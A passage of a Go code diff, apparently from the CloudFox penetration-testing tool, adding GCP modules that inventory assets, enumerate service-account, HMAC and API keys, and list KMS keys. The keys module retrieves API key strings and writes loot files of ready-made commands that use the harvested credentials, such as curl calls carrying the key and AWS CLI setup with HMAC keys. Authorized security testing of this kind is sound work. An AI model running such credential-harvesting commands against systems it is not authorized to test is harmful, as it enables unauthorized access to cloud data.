totals := make(map[string]int) + for _, projectCounts := range m.assetCounts { + for assetType, count := range projectCounts { + totals[assetType] += count + } + } + return totals +} + +// isCoveredAssetType checks if CloudFox has dedicated enumeration for an asset type +func isCoveredAssetType(assetType string) bool { + coveredTypes := map[string]bool{ + "compute.googleapis.com/Instance": true, + "compute.googleapis.com/Disk": true, + "compute.googleapis.com/Snapshot": true, + "compute.googleapis.com/Image": true, + "container.googleapis.com/Cluster": true, + "run.googleapis.com/Service": true, + "run.googleapis.com/Job": 
true, + "cloudfunctions.googleapis.com/Function": true, + "storage.googleapis.com/Bucket": true, + "bigquery.googleapis.com/Dataset": true, + "sqladmin.googleapis.com/Instance": true, + "spanner.googleapis.com/Instance": true, + "bigtableadmin.googleapis.com/Instance": true, + "redis.googleapis.com/Instance": true, + "file.googleapis.com/Instance": true, + "iam.googleapis.com/ServiceAccount": true, + "cloudkms.googleapis.com/KeyRing": true, + "secretmanager.googleapis.com/Secret": true, + "apikeys.googleapis.com/Key": true, + "pubsub.googleapis.com/Topic": true, + "pubsub.googleapis.com/Subscription": true, + "dns.googleapis.com/ManagedZone": true, + "cloudbuild.googleapis.com/BuildTrigger": true, + "sourcerepo.googleapis.com/Repo": true, + "artifactregistry.googleapis.com/Repository": true, + "dataflow.googleapis.com/Job": true, + "dataproc.googleapis.com/Cluster": true, + "notebooks.googleapis.com/Instance": true, + "composer.googleapis.com/Environment": true, + "cloudscheduler.googleapis.com/Job": true, + "logging.googleapis.com/LogSink": true, + "compute.googleapis.com/SecurityPolicy": true, + "certificatemanager.googleapis.com/Certificate": true, + } + return coveredTypes[assetType] +} + +// formatAssetType converts GCP asset type to human-readable name +func formatAssetType(assetType string) string { + // Split by / and take the last part + parts := strings.Split(assetType, "/") + if len(parts) >= 2 { + service := strings.TrimSuffix(parts[0], ".googleapis.com") + resource := parts[len(parts)-1] + return fmt.Sprintf("%s/%s", service, resource) + } + return assetType +} + +// Helper function to extract region from zone (e.g., us-central1-a -> us-central1) +func extractRegionFromZone(zone string) string { + parts := strings.Split(zone, "-") + if len(parts) >= 3 { + return strings.Join(parts[:len(parts)-1], "-") + } + return zone +} + +// writeOutput generates the table and loot files per-project +func (m *InventoryModule) writeOutput(ctx context.Context, logger 
internal.Logger) { + // Build hierarchical output data with per-project results + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Generate output for each project + for _, projectID := range m.ProjectIDs { + projectOutput := m.buildProjectOutput(projectID) + if projectOutput != nil { + outputData.ProjectLevelData[projectID] = projectOutput + } + } + + // Use hierarchical output to write to per-project directories + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_INVENTORY_MODULE_NAME) + } +} + +// buildProjectOutput generates output data for a single project +func (m *InventoryModule) buildProjectOutput(projectID string) internal.CloudfoxOutput { + var tableFiles []internal.TableFile + + // Get project-specific asset counts + projectAssets := m.assetCounts[projectID] + projectAssetTotal := 0 + for _, count := range projectAssets { + projectAssetTotal += count + } + + // Get project-specific detailed resource counts + projectResourceTotal := m.projectGrandTotal[projectID] + + // ======================================== + // Table 1: Complete Asset Inventory (from Cloud Asset API) + // ======================================== + if projectAssetTotal > 0 { + // Sort asset types by count (descending) + var assetTypes []string + for at := range projectAssets { + assetTypes = append(assetTypes, at) + } + sort.Slice(assetTypes, func(i, j int) bool { + return projectAssets[assetTypes[i]] > projectAssets[assetTypes[j]] + }) + + assetHeader := []string{"Asset Type", "Count", "CloudFox Coverage"} + var assetBody [][]string + + // Add total row + assetBody = append(assetBody, []string{"TOTAL", strconv.Itoa(projectAssetTotal), "-"}) + + // Add uncovered assets first 
(these are areas CloudFox might miss) + var uncoveredTypes []string + var coveredTypes []string + for _, at := range assetTypes { + if isCoveredAssetType(at) { + coveredTypes = append(coveredTypes, at) + } else { + uncoveredTypes = append(uncoveredTypes, at) + } + } + + // Uncovered types first (potential blind spots) + for _, at := range uncoveredTypes { + coverage := "NO - potential blind spot" + assetBody = append(assetBody, []string{ + formatAssetType(at), + strconv.Itoa(projectAssets[at]), + coverage, + }) + } + + // Then covered types + for _, at := range coveredTypes { + coverage := "Yes" + assetBody = append(assetBody, []string{ + formatAssetType(at), + strconv.Itoa(projectAssets[at]), + coverage, + }) + } + + tableFiles = append(tableFiles, internal.TableFile{ + Name: "inventory-complete", + Header: assetHeader, + Body: assetBody, + }) + } else if services, ok := m.enabledServices[projectID]; ok && len(services) > 0 { + // ======================================== + // Table 1b: Enabled Services (fallback when Asset API not available) + // ======================================== + serviceHeader := []string{"Service", "CloudFox Coverage", "Description"} + var serviceBody [][]string + + // Filter to interesting services and sort + var interestingServices []string + for _, svc := range services { + if isInterestingService(svc) { + interestingServices = append(interestingServices, svc) + } + } + sort.Strings(interestingServices) + + // Add uncovered services first (potential blind spots) + var uncoveredServices []string + var coveredServices []string + for _, svc := range interestingServices { + if isServiceCoveredByCloudFox(svc) { + coveredServices = append(coveredServices, svc) + } else { + uncoveredServices = append(uncoveredServices, svc) + } + } + + for _, svc := range uncoveredServices { + coverage := "NO - potential blind spot" + desc := getServiceDescription(svc) + serviceBody = append(serviceBody, []string{svc, coverage, desc}) + } + + for _, svc := 
range coveredServices { + coverage := "Yes" + desc := getServiceDescription(svc) + serviceBody = append(serviceBody, []string{svc, coverage, desc}) + } + + if len(serviceBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "inventory-enabled-services", + Header: serviceHeader, + Body: serviceBody, + }) + } + } + + // ======================================== + // Table 2: Detailed Enumeration by Region (from dedicated CloudFox modules) + // Now uses per-project resource tracking + // ======================================== + if projectResourceTotal > 0 { + sortedRegions := m.getSortedRegionsForProject(projectID) + + // Build header: Resource Type, then regions + header := []string{"Resource Type"} + header = append(header, sortedRegions...) + header = append(header, "Total") + + // Build body + var body [][]string + + // Add total row first + totalRow := []string{"TOTAL"} + for _, region := range sortedRegions { + totalRow = append(totalRow, strconv.Itoa(m.projectTotalByRegion[projectID][region])) + } + totalRow = append(totalRow, strconv.Itoa(projectResourceTotal)) + body = append(body, totalRow) + + // Sort resource types alphabetically + var resourceTypes []string + for rt := range m.projectTotalByType[projectID] { + resourceTypes = append(resourceTypes, rt) + } + sort.Strings(resourceTypes) + + // Add row for each resource type (only if it has resources) + for _, resourceType := range resourceTypes { + if m.projectTotalByType[projectID][resourceType] == 0 { + continue + } + + row := []string{resourceType} + for _, region := range sortedRegions { + count := m.projectResourceCounts[projectID][resourceType][region] + if count > 0 { + row = append(row, strconv.Itoa(count)) + } else { + row = append(row, "-") + } + } + row = append(row, strconv.Itoa(m.projectTotalByType[projectID][resourceType])) + body = append(body, row) + } + + tableFiles = append(tableFiles, internal.TableFile{ + Name: "inventory-detailed", + Header: header, + Body: body, + 
}) + } + + // ======================================== + // Loot file: All resource identifiers + // ======================================== + var lootContent strings.Builder + lootContent.WriteString("# GCP Resource Inventory\n") + lootContent.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + lootContent.WriteString("# Generated by CloudFox\n") + lootContent.WriteString(fmt.Sprintf("# Total resources (Asset Inventory): %d\n", projectAssetTotal)) + lootContent.WriteString(fmt.Sprintf("# Total resources (Detailed): %d\n\n", projectResourceTotal)) + + // Sort resource types + var resourceTypes []string + for rt := range m.projectTotalByType[projectID] { + resourceTypes = append(resourceTypes, rt) + } + sort.Strings(resourceTypes) + + sortedRegions := m.getSortedRegionsForProject(projectID) + for _, resourceType := range resourceTypes { + if m.projectTotalByType[projectID][resourceType] == 0 { + continue + } + lootContent.WriteString(fmt.Sprintf("## %s (%d)\n", resourceType, m.projectTotalByType[projectID][resourceType])) + for _, region := range sortedRegions { + if m.projectResourceIDs[projectID] != nil && m.projectResourceIDs[projectID][resourceType] != nil { + for _, resourceID := range m.projectResourceIDs[projectID][resourceType][region] { + lootContent.WriteString(fmt.Sprintf("%s\n", resourceID)) + } + } + } + lootContent.WriteString("\n") + } + + lootFiles := []internal.LootFile{{ + Name: "inventory-resources", + Contents: lootContent.String(), + }} + + // Only return output if we have data + if len(tableFiles) == 0 && lootContent.Len() == 0 { + return nil + } + + return InventoryOutput{ + Table: tableFiles, + Loot: lootFiles, + } +} + +// getSortedRegionsForProject returns regions sorted by count for a specific project, with "global" first +func (m *InventoryModule) getSortedRegionsForProject(projectID string) []string { + var regions []string + if m.projectRegions[projectID] == nil { + return regions + } + for region := range 
m.projectRegions[projectID] { + regions = append(regions, region) + } + + // Sort by count descending + sort.Slice(regions, func(i, j int) bool { + // Global always first + if regions[i] == "global" { + return true + } + if regions[j] == "global" { + return false + } + return m.projectTotalByRegion[projectID][regions[i]] > m.projectTotalByRegion[projectID][regions[j]] + }) + + return regions +} diff --git a/gcp/commands/keys.go b/gcp/commands/keys.go new file mode 100755 index 00000000..c234f276 --- /dev/null +++ b/gcp/commands/keys.go @@ -0,0 +1,574 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + apikeysservice "github.com/BishopFox/cloudfox/gcp/services/apikeysService" + hmacservice "github.com/BishopFox/cloudfox/gcp/services/hmacService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPKeysCommand = &cobra.Command{ + Use: globals.GCP_KEYS_MODULE_NAME, + Aliases: []string{"credentials", "creds", "access-keys"}, + Short: "Enumerate all GCP keys (SA keys, HMAC keys, API keys)", + Long: `Enumerate all types of GCP keys and credentials. + +Key Types: +- SA Keys: Service account RSA keys for OAuth 2.0 authentication +- HMAC Keys: S3-compatible access keys for Cloud Storage +- API Keys: Project-level keys for API access (Maps, Translation, etc.) 
+ +Features: +- Unified view of all credential types +- Shows key age and expiration status +- Identifies Google-managed vs user-managed keys +- Generates exploitation commands for penetration testing`, + Run: runGCPKeysCommand, +} + +// UnifiedKeyInfo represents a key from any source +type UnifiedKeyInfo struct { + ProjectID string + KeyType string // "SA Key", "HMAC", "API Key" + KeyID string + Owner string // Email for SA/HMAC, "Project-level" for API keys + DisplayName string + Origin string // "Google Managed", "User Managed", "Service Account", "User", "-" + Algorithm string // Key algorithm (e.g., "KEY_ALG_RSA_2048") + State string // "ACTIVE", "INACTIVE", "DELETED", "DISABLED" + CreateTime time.Time + ExpireTime time.Time + Expired bool + DWDEnabled bool // For SA keys - whether the SA has Domain-Wide Delegation enabled + Restrictions string // For API keys only + KeyString string // For API keys only (if accessible) +} + +type KeysModule struct { + gcpinternal.BaseGCPModule + ProjectKeys map[string][]UnifiedKeyInfo // projectID -> keys + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type KeysOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o KeysOutput) TableFiles() []internal.TableFile { return o.Table } +func (o KeysOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPKeysCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_KEYS_MODULE_NAME) + if err != nil { + return + } + + module := &KeysModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectKeys: make(map[string][]UnifiedKeyInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *KeysModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KEYS_MODULE_NAME, m.processProject) + 
+ allKeys := m.getAllKeys() + if len(allKeys) == 0 { + logger.InfoM("No keys found", globals.GCP_KEYS_MODULE_NAME) + return + } + + // Count by type + saKeyCount := 0 + hmacKeyCount := 0 + apiKeyCount := 0 + userManagedCount := 0 + + for _, key := range allKeys { + switch key.KeyType { + case "SA Key": + saKeyCount++ + if key.Origin == "User Managed" { + userManagedCount++ + } + case "HMAC": + hmacKeyCount++ + case "API Key": + apiKeyCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d key(s) (%d SA keys [%d user-managed], %d HMAC keys, %d API keys)", + len(allKeys), saKeyCount, userManagedCount, hmacKeyCount, apiKeyCount), globals.GCP_KEYS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllKeys returns all keys from all projects +func (m *KeysModule) getAllKeys() []UnifiedKeyInfo { + var all []UnifiedKeyInfo + for _, keys := range m.ProjectKeys { + all = append(all, keys...) + } + return all +} + +func (m *KeysModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating keys in project: %s", projectID), globals.GCP_KEYS_MODULE_NAME) + } + + var projectKeys []UnifiedKeyInfo + + // 1. 
Enumerate Service Account Keys + iamService := IAMService.New() + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate service accounts in project %s", projectID)) + } else { + for _, sa := range serviceAccounts { + // Check if DWD is enabled (OAuth2ClientID is set) + dwdEnabled := sa.OAuth2ClientID != "" + + for _, key := range sa.Keys { + // Extract key ID from full name + keyID := key.Name + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + + origin := "Google Managed" + if key.KeyType == "USER_MANAGED" { + origin = "User Managed" + } + + state := "ACTIVE" + if key.Disabled { + state = "DISABLED" + } + + expired := false + if !key.ValidBefore.IsZero() && time.Now().After(key.ValidBefore) { + expired = true + } + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "SA Key", + KeyID: keyID, + Owner: sa.Email, + DisplayName: sa.DisplayName, + Origin: origin, + Algorithm: key.KeyAlgorithm, + State: state, + CreateTime: key.ValidAfter, + ExpireTime: key.ValidBefore, + Expired: expired, + DWDEnabled: dwdEnabled, + }) + } + } + } + + // 2. 
Enumerate HMAC Keys + hmacService := hmacservice.New() + hmacKeys, err := hmacService.ListHMACKeys(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate HMAC keys in project %s", projectID)) + } else { + for _, key := range hmacKeys { + origin := "Service Account" + // Note: User HMAC keys are not enumerable via API, so all we see are SA keys + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "HMAC", + KeyID: key.AccessID, + Owner: key.ServiceAccountEmail, + DisplayName: "", + Origin: origin, + State: key.State, + CreateTime: key.TimeCreated, + Expired: false, // HMAC keys don't expire + }) + } + } + + // 3. Enumerate API Keys + apiKeysService := apikeysservice.New() + apiKeys, err := apiKeysService.ListAPIKeysWithKeyStrings(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate API keys in project %s", projectID)) + } else { + for _, key := range apiKeys { + // Extract key ID from full name + keyID := key.UID + if keyID == "" { + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + } + + state := "ACTIVE" + if !key.DeleteTime.IsZero() { + state = "DELETED" + } + + restrictions := "None" + if key.HasRestrictions { + restrictions = key.RestrictionType + if len(key.AllowedAPIs) > 0 { + restrictions = fmt.Sprintf("%s (APIs: %d)", key.RestrictionType, len(key.AllowedAPIs)) + } + } + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "API Key", + KeyID: keyID, + Owner: "Project-level", + DisplayName: key.DisplayName, + Origin: "-", + State: state, + CreateTime: key.CreateTime, + Expired: false, // API keys don't expire + Restrictions: restrictions, + KeyString: key.KeyString, + }) + } + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectKeys[projectID] = projectKeys + + // Initialize 
loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["keys-hmac-s3-commands"] = &internal.LootFile{ + Name: "keys-hmac-s3-commands", + Contents: "# HMAC S3-Compatible Access Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["keys-apikey-test-commands"] = &internal.LootFile{ + Name: "keys-apikey-test-commands", + Contents: "# API Key Test Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["keys-enumeration-commands"] = &internal.LootFile{ + Name: "keys-enumeration-commands", + Contents: "# Key Enumeration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, key := range projectKeys { + m.addKeyToLoot(projectID, key) + } + m.mu.Unlock() +} + +func (m *KeysModule) addKeyToLoot(projectID string, key UnifiedKeyInfo) { + switch key.KeyType { + case "SA Key": + // Add enumeration commands for user-managed SA keys, especially old ones + if key.Origin == "User Managed" { + lootFile := m.LootMap[projectID]["keys-enumeration-commands"] + if lootFile != nil { + age := "-" + ageWarning := "" + if !key.CreateTime.IsZero() { + ageDuration := time.Since(key.CreateTime) + age = formatKeyAge(ageDuration) + days := int(ageDuration.Hours() / 24) + if days >= 365 { + ageWarning = " [OLD KEY - " + age + "]" + } else if days >= 90 { + ageWarning = " [" + age + " old]" + } + } + + lootFile.Contents += fmt.Sprintf( + "# SA Key: %s%s\n"+ + "# Service Account: %s\n"+ + "# Project: %s\n"+ + "# Created: %s (Age: %s)\n"+ + "# Origin: %s\n\n"+ + "# List all keys for this service account:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n"+ + "# Describe specific key:\n"+ + "gcloud iam service-accounts keys get-public-key %s --iam-account=%s --project=%s\n\n", + key.KeyID, + ageWarning, + key.Owner, + 
key.ProjectID, + key.CreateTime.Format("2006-01-02"), + age, + key.Origin, + key.Owner, + key.ProjectID, + key.KeyID, + key.Owner, + key.ProjectID, + ) + } + } + + case "HMAC": + if key.State == "ACTIVE" { + lootFile := m.LootMap[projectID]["keys-hmac-s3-commands"] + if lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# HMAC Key: %s\n"+ + "# Service Account: %s\n"+ + "# Project: %s\n\n"+ + "# Configure AWS CLI with HMAC credentials:\n"+ + "aws configure set aws_access_key_id %s\n"+ + "aws configure set aws_secret_access_key \n\n"+ + "# List buckets via S3-compatible endpoint:\n"+ + "aws --endpoint-url https://storage.googleapis.com s3 ls\n\n", + key.KeyID, + key.Owner, + key.ProjectID, + key.KeyID, + ) + } + } + + case "API Key": + if key.KeyString != "" { + lootFile := m.LootMap[projectID]["keys-apikey-test-commands"] + if lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# API Key: %s (%s)\n"+ + "# Project: %s\n"+ + "# Restrictions: %s\n\n"+ + "# Test API access:\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://maps.googleapis.com/maps/api/geocode/json?address=test'\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://translation.googleapis.com/language/translate/v2?q=Hello&target=es'\n\n", + key.KeyID, + key.DisplayName, + key.ProjectID, + key.Restrictions, + key.KeyString, + key.KeyString, + ) + } + } + } +} + +func (m *KeysModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getTableHeader returns the header for the keys table +func (m *KeysModule) getTableHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Key Type", + "Key ID", + "Owner", + "Origin", + "Algorithm", + "State", + "Created", + "Expires", + "Age", + "DWD", + "Restrictions", + } +} + +// keysToTableBody converts keys to table body rows +func (m *KeysModule) keysToTableBody(keys []UnifiedKeyInfo) [][]string { + var 
body [][]string + for _, key := range keys { + created := "-" + if !key.CreateTime.IsZero() { + created = key.CreateTime.Format("2006-01-02") + } + + // Calculate age + age := "-" + if !key.CreateTime.IsZero() { + age = formatKeyAge(time.Since(key.CreateTime)) + } + + expires := "-" + if !key.ExpireTime.IsZero() { + // Check for "never expires" (year 9999) + if key.ExpireTime.Year() >= 9999 { + expires = "Never" + } else { + expires = key.ExpireTime.Format("2006-01-02") + } + } + + dwd := "-" + if key.KeyType == "SA Key" { + if key.DWDEnabled { + dwd = "Yes" + } else { + dwd = "No" + } + } + + restrictions := "-" + if key.KeyType == "API Key" { + restrictions = key.Restrictions + } + + algorithm := key.Algorithm + if algorithm == "" { + algorithm = "-" + } + + body = append(body, []string{ + key.ProjectID, + m.GetProjectName(key.ProjectID), + key.KeyType, + key.KeyID, + key.Owner, + key.Origin, + algorithm, + key.State, + created, + expires, + age, + dwd, + restrictions, + }) + } + return body +} + +// formatKeyAge formats a duration into a human-readable age string +func formatKeyAge(d time.Duration) string { + days := int(d.Hours() / 24) + if days >= 365 { + years := days / 365 + remainingDays := days % 365 + months := remainingDays / 30 + if months > 0 { + return fmt.Sprintf("%dy %dm", years, months) + } + return fmt.Sprintf("%dy", years) + } else if days >= 30 { + months := days / 30 + remainingDays := days % 30 + if remainingDays > 0 { + return fmt.Sprintf("%dm %dd", months, remainingDays) + } + return fmt.Sprintf("%dm", months) + } + return fmt.Sprintf("%dd", days) +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *KeysModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, keys := range m.ProjectKeys { + body := 
m.keysToTableBody(keys) + tableFiles := []internal.TableFile{{ + Name: "keys", + Header: m.getTableHeader(), + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = KeysOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_KEYS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *KeysModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allKeys := m.getAllKeys() + body := m.keysToTableBody(allKeys) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{ + Name: "keys", + Header: m.getTableHeader(), + Body: body, + }} + + output := KeysOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_KEYS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/kms.go 
b/gcp/commands/kms.go new file mode 100644 index 00000000..af23e7d5 --- /dev/null +++ b/gcp/commands/kms.go @@ -0,0 +1,564 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + KMSService "github.com/BishopFox/cloudfox/gcp/services/kmsService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPKMSCommand = &cobra.Command{ + Use: globals.GCP_KMS_MODULE_NAME, + Aliases: []string{"crypto", "encryption-keys"}, + Short: "Enumerate Cloud KMS key rings and crypto keys with security analysis", + Long: `Enumerate Cloud KMS key rings and crypto keys across projects with security-relevant details. + +Features: +- Lists all KMS key rings and crypto keys +- Shows key purpose (encryption, signing, MAC) +- Identifies protection level (software, HSM, external) +- Shows rotation configuration and status +- Detects public key access via IAM +- Generates gcloud commands for key operations + +Security Columns: +- Purpose: ENCRYPT_DECRYPT, ASYMMETRIC_SIGN, ASYMMETRIC_DECRYPT, MAC +- Protection: SOFTWARE, HSM, EXTERNAL, EXTERNAL_VPC +- Rotation: Key rotation period and next rotation time +- PublicDecrypt: Whether allUsers/allAuthenticatedUsers can decrypt + +Resource IAM Columns: +- IAM Binding Role: The IAM role granted ON this key (e.g., roles/cloudkms.cryptoKeyDecrypter) +- IAM Binding Principal: The principal (user/SA/group) who has that role on this key + +Attack Surface: +- Public decrypt access allows unauthorized data access +- Keys without rotation may be compromised long-term +- HSM vs software protection affects key extraction risk +- External keys indicate third-party key management`, + Run: runGCPKMSCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type KMSModule struct { + gcpinternal.BaseGCPModule + + // Per-project data 
for hierarchical output + ProjectKeyRings map[string][]KMSService.KeyRingInfo + ProjectCryptoKeys map[string][]KMSService.CryptoKeyInfo + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type KMSOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o KMSOutput) TableFiles() []internal.TableFile { return o.Table } +func (o KMSOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPKMSCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_KMS_MODULE_NAME) + if err != nil { + return + } + + module := &KMSModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectKeyRings: make(map[string][]KMSService.KeyRingInfo), + ProjectCryptoKeys: make(map[string][]KMSService.CryptoKeyInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *KMSModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KMS_MODULE_NAME, m.processProject) + + // Get all data for stats + allKeyRings := m.getAllKeyRings() + allCryptoKeys := m.getAllCryptoKeys() + + if len(allCryptoKeys) == 0 { + logger.InfoM("No KMS keys found", globals.GCP_KMS_MODULE_NAME) + return + } + + // Count security-relevant metrics + hsmCount := 0 + publicDecryptCount := 0 + for _, key := range allCryptoKeys { + if key.ProtectionLevel == "HSM" { + hsmCount++ + } + if key.IsPublicDecrypt { + publicDecryptCount++ + } + } + + msg := fmt.Sprintf("Found %d key ring(s), %d key(s)", len(allKeyRings), len(allCryptoKeys)) + if hsmCount > 0 { + msg += fmt.Sprintf(" [%d HSM]", hsmCount) + 
} + if publicDecryptCount > 0 { + msg += fmt.Sprintf(" [%d PUBLIC DECRYPT!]", publicDecryptCount) + } + logger.SuccessM(msg, globals.GCP_KMS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllKeyRings returns all key rings from all projects +func (m *KMSModule) getAllKeyRings() []KMSService.KeyRingInfo { + var all []KMSService.KeyRingInfo + for _, keyRings := range m.ProjectKeyRings { + all = append(all, keyRings...) + } + return all +} + +// getAllCryptoKeys returns all crypto keys from all projects +func (m *KMSModule) getAllCryptoKeys() []KMSService.CryptoKeyInfo { + var all []KMSService.CryptoKeyInfo + for _, keys := range m.ProjectCryptoKeys { + all = append(all, keys...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *KMSModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating KMS in project: %s", projectID), globals.GCP_KMS_MODULE_NAME) + } + + ks := KMSService.New() + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["kms-commands"] = &internal.LootFile{ + Name: "kms-commands", + Contents: "# KMS Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // Get key rings + keyRings, err := ks.KeyRings(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, + fmt.Sprintf("Could not enumerate KMS key rings in project %s", projectID)) + return + } + + // Get crypto keys + keys, err := ks.CryptoKeys(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, + fmt.Sprintf("Could not enumerate KMS keys in project %s", projectID)) + } + + // 
